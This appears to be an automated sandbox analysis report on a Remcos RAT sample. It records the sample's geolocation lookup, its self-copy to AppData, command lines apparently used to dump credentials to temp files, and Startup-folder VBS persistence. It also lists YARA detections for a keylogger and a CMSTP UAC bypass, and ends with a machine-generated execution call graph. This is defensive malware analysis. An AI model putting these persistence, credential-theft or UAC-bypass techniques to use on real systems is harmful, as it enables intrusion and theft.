                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                        Sep 3, 2024 15:24:09.006366968 CEST | 1170 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 13:24:08 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                        Target ID: 0
                        Start time: 09:24:03
                        Start date: 03/09/2024
                        Path: C:\Users\user\Desktop\Rgh99876k7e.exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\Rgh99876k7e.exe"
                        Imagebase: 0x700000
                        File size: 1'521'152 bytes
                        MD5 hash: BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: low
                        Has exited: true

                        Target ID: 2
                        Start time: 09:24:04
                        Start date: 03/09/2024
                        Path: C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\Rgh99876k7e.exe"
                        Imagebase: 0x890000
                        File size: 1'521'152 bytes
                        MD5 hash: BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 63%, ReversingLabs
                        Reputation:low
                        Has exited:false

                        Target ID:3
                        Start time:09:24:08
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:4
                        Start time:09:24:08
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:5
                        Start time:09:24:08
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:09:24:15
                        Start date:03/09/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs"
                        Imagebase:0x7ff7bff00000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:09:24:16
                        Start date:03/09/2024
                        Path:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Cocles\antholite.exe"
                        Imagebase:0x890000
                        File size:1'521'152 bytes
                        MD5 hash:BD6420AAF066A5B4533598417866BC67
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:2.9%
                          Dynamic/Decrypted Code Coverage:0.4%
                          Signature Coverage:3.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:42
__dosmaperr 96851->96909 96922 720a8c 96878->96922 96890->96817 96891->96829 96892->96833 96893->96832 96894->96829 96895->96821 96896->96825 96897->96829 96899 73f89b __fread_nolock 26 API calls 96898->96899 96905->96846 96908->96851 96911->96848 96923 720a97 IsProcessorFeaturePresent 96922->96923 96924 720a95 96922->96924 96926 720c5d 96923->96926 96924->96845 96930 720c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96926->96930 96939 738585 96931->96939 96934->96800 96935->96806 96936->96801 96937->96807 96938->96806 96940 738591 ___DestructExceptionObject 96939->96940 96950 735147 EnterCriticalSection 96940->96950 96942 73859f 96943 7385d1 96942->96943 96944 7385c6 96942->96944 96966 72f2d9 20 API calls __dosmaperr 96943->96966 96951 7386ae 96944->96951 96947 7385cc 96967 7385fb LeaveCriticalSection __wsopen_s 96947->96967 96950->96942 96968 7353c4 96951->96968 96966->96947 96988 701098 96993 7042de 96988->96993 96992 7010a7 96994 70a961 22 API calls 96993->96994 96995 7042f5 GetVersionExW 96994->96995 96996 706b57 22 API calls 96995->96996 96997 704342 96996->96997 96998 7093b2 22 API calls 96997->96998 97008 704378 96997->97008 96999 70436c 96998->96999 97001 7037a0 22 API calls 96999->97001 97000 70441b GetCurrentProcess IsWow64Process 97002 704437 97000->97002 97001->97008 97004 743824 GetSystemInfo 97002->97004 97005 70444f LoadLibraryA 97002->97005 97003 7437df 97006 704460 GetProcAddress 97005->97006 97007 70449c GetSystemInfo 97005->97007 97006->97007 97009 704470 GetNativeSystemInfo 97006->97009 97010 704476 97007->97010 97008->97000 97008->97003 97009->97010 97011 70109d 97010->97011 97012 70447a FreeLibrary 97010->97012 97013 7200a3 29 API calls __onexit 97011->97013 97012->97011 97013->96992 97014 7390fa 97015 739107 97014->97015 97018 73911f 97014->97018 97064 72f2d9 20 API calls __dosmaperr 97015->97064 97017 73910c 97065 7327ec 26 API calls pre_c_initialization 97017->97065 97020 73917a 97018->97020 
97028 739117 97018->97028 97066 73fdc4 21 API calls 2 library calls 97018->97066 97022 72d955 __fread_nolock 26 API calls 97020->97022 97023 739192 97022->97023 97034 738c32 97023->97034 97025 739199 97026 72d955 __fread_nolock 26 API calls 97025->97026 97025->97028 97027 7391c5 97026->97027 97027->97028 97029 72d955 __fread_nolock 26 API calls 97027->97029 97030 7391d3 97029->97030 97030->97028 97031 72d955 __fread_nolock 26 API calls 97030->97031 97032 7391e3 97031->97032 97033 72d955 __fread_nolock 26 API calls 97032->97033 97033->97028 97035 738c3e ___DestructExceptionObject 97034->97035 97036 738c46 97035->97036 97037 738c5e 97035->97037 97068 72f2c6 20 API calls __dosmaperr 97036->97068 97038 738d24 97037->97038 97042 738c97 97037->97042 97075 72f2c6 20 API calls __dosmaperr 97038->97075 97041 738c4b 97069 72f2d9 20 API calls __dosmaperr 97041->97069 97045 738ca6 97042->97045 97046 738cbb 97042->97046 97043 738d29 97076 72f2d9 20 API calls __dosmaperr 97043->97076 97070 72f2c6 20 API calls __dosmaperr 97045->97070 97067 735147 EnterCriticalSection 97046->97067 97050 738cb3 97077 7327ec 26 API calls pre_c_initialization 97050->97077 97051 738cab 97071 72f2d9 20 API calls __dosmaperr 97051->97071 97052 738cc1 97055 738cf2 97052->97055 97056 738cdd 97052->97056 97053 738c53 __fread_nolock 97053->97025 97058 738d45 __fread_nolock 38 API calls 97055->97058 97072 72f2d9 20 API calls __dosmaperr 97056->97072 97060 738ced 97058->97060 97074 738d1c LeaveCriticalSection __wsopen_s 97060->97074 97061 738ce2 97073 72f2c6 20 API calls __dosmaperr 97061->97073 97064->97017 97065->97028 97066->97020 97067->97052 97068->97041 97069->97053 97070->97051 97071->97050 97072->97061 97073->97060 97074->97053 97075->97043 97076->97050 97077->97053 97078 7203fb 97079 720407 ___DestructExceptionObject 97078->97079 97107 71feb1 97079->97107 97081 72040e 97082 720561 97081->97082 97085 720438 97081->97085 97134 72083f IsProcessorFeaturePresent IsDebuggerPresent 
SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97082->97134 97084 720568 97135 724e52 28 API calls _abort 97084->97135 97096 720477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97085->97096 97118 73247d 97085->97118 97087 72056e 97136 724e04 28 API calls _abort 97087->97136 97091 720576 97092 720457 97094 7204d8 97126 720959 97094->97126 97096->97094 97130 724e1a 38 API calls 3 library calls 97096->97130 97098 7204de 97099 7204f3 97098->97099 97131 720992 GetModuleHandleW 97099->97131 97101 7204fa 97101->97084 97102 7204fe 97101->97102 97103 720507 97102->97103 97132 724df5 28 API calls _abort 97102->97132 97133 720040 13 API calls 2 library calls 97103->97133 97106 72050f 97106->97092 97108 71feba 97107->97108 97137 720698 IsProcessorFeaturePresent 97108->97137 97110 71fec6 97138 722c94 10 API calls 3 library calls 97110->97138 97112 71fecb 97113 71fecf 97112->97113 97139 732317 97112->97139 97113->97081 97116 71fee6 97116->97081 97121 732494 97118->97121 97119 720a8c _ValidateLocalCookies 5 API calls 97120 720451 97119->97120 97120->97092 97122 732421 97120->97122 97121->97119 97123 732450 97122->97123 97124 720a8c _ValidateLocalCookies 5 API calls 97123->97124 97125 732479 97124->97125 97125->97096 97190 722340 97126->97190 97129 72097f 97129->97098 97130->97094 97131->97101 97132->97103 97133->97106 97134->97084 97135->97087 97136->97091 97137->97110 97138->97112 97143 73d1f6 97139->97143 97142 722cbd 8 API calls 3 library calls 97142->97113 97144 73d213 97143->97144 97147 73d20f 97143->97147 97144->97147 97149 734bfb 97144->97149 97145 720a8c _ValidateLocalCookies 5 API calls 97146 71fed8 97145->97146 97146->97116 97146->97142 97147->97145 97150 734c07 ___DestructExceptionObject 97149->97150 97161 732f5e EnterCriticalSection 97150->97161 97152 734c0e 97162 7350af 97152->97162 97154 734c1d 97155 734c2c 97154->97155 97175 734a8f 29 API calls 97154->97175 97177 734c48 LeaveCriticalSection _abort 97155->97177 97158 
734c27 97176 734b45 GetStdHandle GetFileType 97158->97176 97159 734c3d __fread_nolock 97159->97144 97161->97152 97163 7350bb ___DestructExceptionObject 97162->97163 97164 7350c8 97163->97164 97165 7350df 97163->97165 97186 72f2d9 20 API calls __dosmaperr 97164->97186 97178 732f5e EnterCriticalSection 97165->97178 97168 7350cd 97187 7327ec 26 API calls pre_c_initialization 97168->97187 97169 7350eb 97174 735117 97169->97174 97179 735000 97169->97179 97173 7350d7 __fread_nolock 97173->97154 97188 73513e LeaveCriticalSection _abort 97174->97188 97175->97158 97176->97155 97177->97159 97178->97169 97180 734c7d pre_c_initialization 20 API calls 97179->97180 97181 735012 97180->97181 97185 73501f 97181->97185 97189 733405 11 API calls 2 library calls 97181->97189 97182 7329c8 _free 20 API calls 97184 735071 97182->97184 97184->97169 97185->97182 97186->97168 97187->97173 97188->97173 97189->97181 97191 72096c GetStartupInfoW 97190->97191 97191->97129 97192 70105b 97197 70344d 97192->97197 97194 70106a 97228 7200a3 29 API calls __onexit 97194->97228 97196 701074 97198 70345d __wsopen_s 97197->97198 97199 70a961 22 API calls 97198->97199 97200 703513 97199->97200 97201 703a5a 24 API calls 97200->97201 97202 70351c 97201->97202 97229 703357 97202->97229 97205 7033c6 22 API calls 97206 703535 97205->97206 97207 70515f 22 API calls 97206->97207 97208 703544 97207->97208 97209 70a961 22 API calls 97208->97209 97210 70354d 97209->97210 97211 70a6c3 22 API calls 97210->97211 97212 703556 RegOpenKeyExW 97211->97212 97213 743176 RegQueryValueExW 97212->97213 97218 703578 97212->97218 97214 743193 97213->97214 97215 74320c RegCloseKey 97213->97215 97216 71fe0b 22 API calls 97214->97216 97215->97218 97226 74321e _wcslen 97215->97226 97217 7431ac 97216->97217 97219 705722 22 API calls 97217->97219 97218->97194 97220 7431b7 RegQueryValueExW 97219->97220 97221 7431d4 97220->97221 97223 7431ee messages 97220->97223 97222 706b57 22 API calls 97221->97222 97222->97223 97223->97215 97224 
709cb3 22 API calls 97224->97226 97225 70515f 22 API calls 97225->97226 97226->97218 97226->97224 97226->97225 97227 704c6d 22 API calls 97226->97227 97227->97226 97228->97196 97230 741f50 __wsopen_s 97229->97230 97231 703364 GetFullPathNameW 97230->97231 97232 703386 97231->97232 97233 706b57 22 API calls 97232->97233 97234 7033a4 97233->97234 97234->97205 97235 70f7bf 97236 70f7d3 97235->97236 97237 70fcb6 97235->97237 97239 70fcc2 97236->97239 97240 71fddb 22 API calls 97236->97240 97330 70aceb 23 API calls messages 97237->97330 97331 70aceb 23 API calls messages 97239->97331 97242 70f7e5 97240->97242 97242->97239 97243 70f83e 97242->97243 97244 70fd3d 97242->97244 97261 70ed9d messages 97243->97261 97270 711310 97243->97270 97332 771155 22 API calls 97244->97332 97247 754beb 97336 77359c 82 API calls __wsopen_s 97247->97336 97249 70fef7 97254 70a8c7 22 API calls 97249->97254 97249->97261 97251 754600 97256 70a8c7 22 API calls 97251->97256 97251->97261 97252 754b0b 97334 77359c 82 API calls __wsopen_s 97252->97334 97254->97261 97256->97261 97258 70a8c7 22 API calls 97267 70ec76 messages 97258->97267 97259 70fbe3 97259->97261 97262 754bdc 97259->97262 97269 70f3ae messages 97259->97269 97260 70a961 22 API calls 97260->97267 97335 77359c 82 API calls __wsopen_s 97262->97335 97264 7200a3 29 API calls pre_c_initialization 97264->97267 97265 720242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97265->97267 97266 71fddb 22 API calls 97266->97267 97267->97247 97267->97249 97267->97251 97267->97252 97267->97258 97267->97259 97267->97260 97267->97261 97267->97264 97267->97265 97267->97266 97268 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97267->97268 97267->97269 97328 7101e0 256 API calls 2 library calls 97267->97328 97329 7106a0 41 API calls messages 97267->97329 97268->97267 97269->97261 97333 77359c 82 API calls __wsopen_s 97269->97333 97271 7117b0 97270->97271 
97272 711376 97270->97272 97551 720242 5 API calls __Init_thread_wait 97271->97551 97273 711390 97272->97273 97274 756331 97272->97274 97337 711940 97273->97337 97556 78709c 256 API calls 97274->97556 97278 7117ba 97281 7117fb 97278->97281 97283 709cb3 22 API calls 97278->97283 97280 75633d 97280->97267 97285 756346 97281->97285 97287 71182c 97281->97287 97282 711940 9 API calls 97284 7113b6 97282->97284 97290 7117d4 97283->97290 97284->97281 97286 7113ec 97284->97286 97557 77359c 82 API calls __wsopen_s 97285->97557 97286->97285 97310 711408 __fread_nolock 97286->97310 97553 70aceb 23 API calls messages 97287->97553 97552 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97290->97552 97291 711839 97554 71d217 256 API calls 97291->97554 97294 75636e 97558 77359c 82 API calls __wsopen_s 97294->97558 97295 71152f 97297 7563d1 97295->97297 97298 71153c 97295->97298 97560 785745 54 API calls _wcslen 97297->97560 97300 711940 9 API calls 97298->97300 97301 711549 97300->97301 97305 7564fa 97301->97305 97307 711940 9 API calls 97301->97307 97302 71fddb 22 API calls 97302->97310 97303 711872 97555 71faeb 23 API calls 97303->97555 97304 71fe0b 22 API calls 97304->97310 97316 756369 97305->97316 97561 77359c 82 API calls __wsopen_s 97305->97561 97312 711563 97307->97312 97309 70ec40 256 API calls 97309->97310 97310->97291 97310->97294 97310->97295 97310->97302 97310->97304 97310->97309 97311 7563b2 97310->97311 97310->97316 97559 77359c 82 API calls __wsopen_s 97311->97559 97312->97305 97314 70a8c7 22 API calls 97312->97314 97317 7115c7 messages 97312->97317 97314->97317 97315 711940 9 API calls 97315->97317 97316->97267 97317->97303 97317->97305 97317->97315 97317->97316 97320 71167b messages 97317->97320 97325 704f39 68 API calls 97317->97325 97347 78958b 97317->97347 97350 78959f 97317->97350 97353 776ef1 97317->97353 97433 76d4ce 97317->97433 97436 77744a 97317->97436 97493 71effa 97317->97493 97318 71171d 97318->97267 97320->97318 97550 71ce17 22 API 
calls messages 97320->97550 97325->97317 97328->97267 97329->97267 97330->97239 97331->97244 97332->97261 97333->97261 97334->97261 97335->97247 97336->97261 97338 711981 97337->97338 97343 71195d 97337->97343 97562 720242 5 API calls __Init_thread_wait 97338->97562 97341 71198b 97341->97343 97563 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97341->97563 97342 718727 97346 7113a0 97342->97346 97565 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97342->97565 97343->97346 97564 720242 5 API calls __Init_thread_wait 97343->97564 97346->97282 97566 787f59 97347->97566 97349 78959b 97349->97317 97351 787f59 120 API calls 97350->97351 97352 7895af 97351->97352 97352->97317 97354 70a961 22 API calls 97353->97354 97355 776f1d 97354->97355 97356 70a961 22 API calls 97355->97356 97357 776f26 97356->97357 97358 776f3a 97357->97358 97850 70b567 97357->97850 97360 707510 53 API calls 97358->97360 97361 776f57 _wcslen 97360->97361 97362 7770bf 97361->97362 97363 776fbc 97361->97363 97374 7770e9 97361->97374 97364 704ecb 94 API calls 97362->97364 97365 707510 53 API calls 97363->97365 97366 7770d0 97364->97366 97367 776fc8 97365->97367 97368 7770e5 97366->97368 97370 704ecb 94 API calls 97366->97370 97369 70a8c7 22 API calls 97367->97369 97376 776fdb 97367->97376 97371 70a961 22 API calls 97368->97371 97368->97374 97369->97376 97370->97368 97372 77711a 97371->97372 97373 70a961 22 API calls 97372->97373 97377 777126 97373->97377 97374->97317 97375 777027 97379 707510 53 API calls 97375->97379 97376->97375 97378 777005 97376->97378 97381 70a8c7 22 API calls 97376->97381 97380 70a961 22 API calls 97377->97380 97382 7033c6 22 API calls 97378->97382 97383 777034 97379->97383 97386 77712f 97380->97386 97381->97378 97387 77700f 97382->97387 97384 777047 97383->97384 97385 77703d 97383->97385 97855 76e199 GetFileAttributesW 97384->97855 97388 70a8c7 22 API calls 97385->97388 97390 70a961 22 API calls 97386->97390 97391 707510 53 API calls 
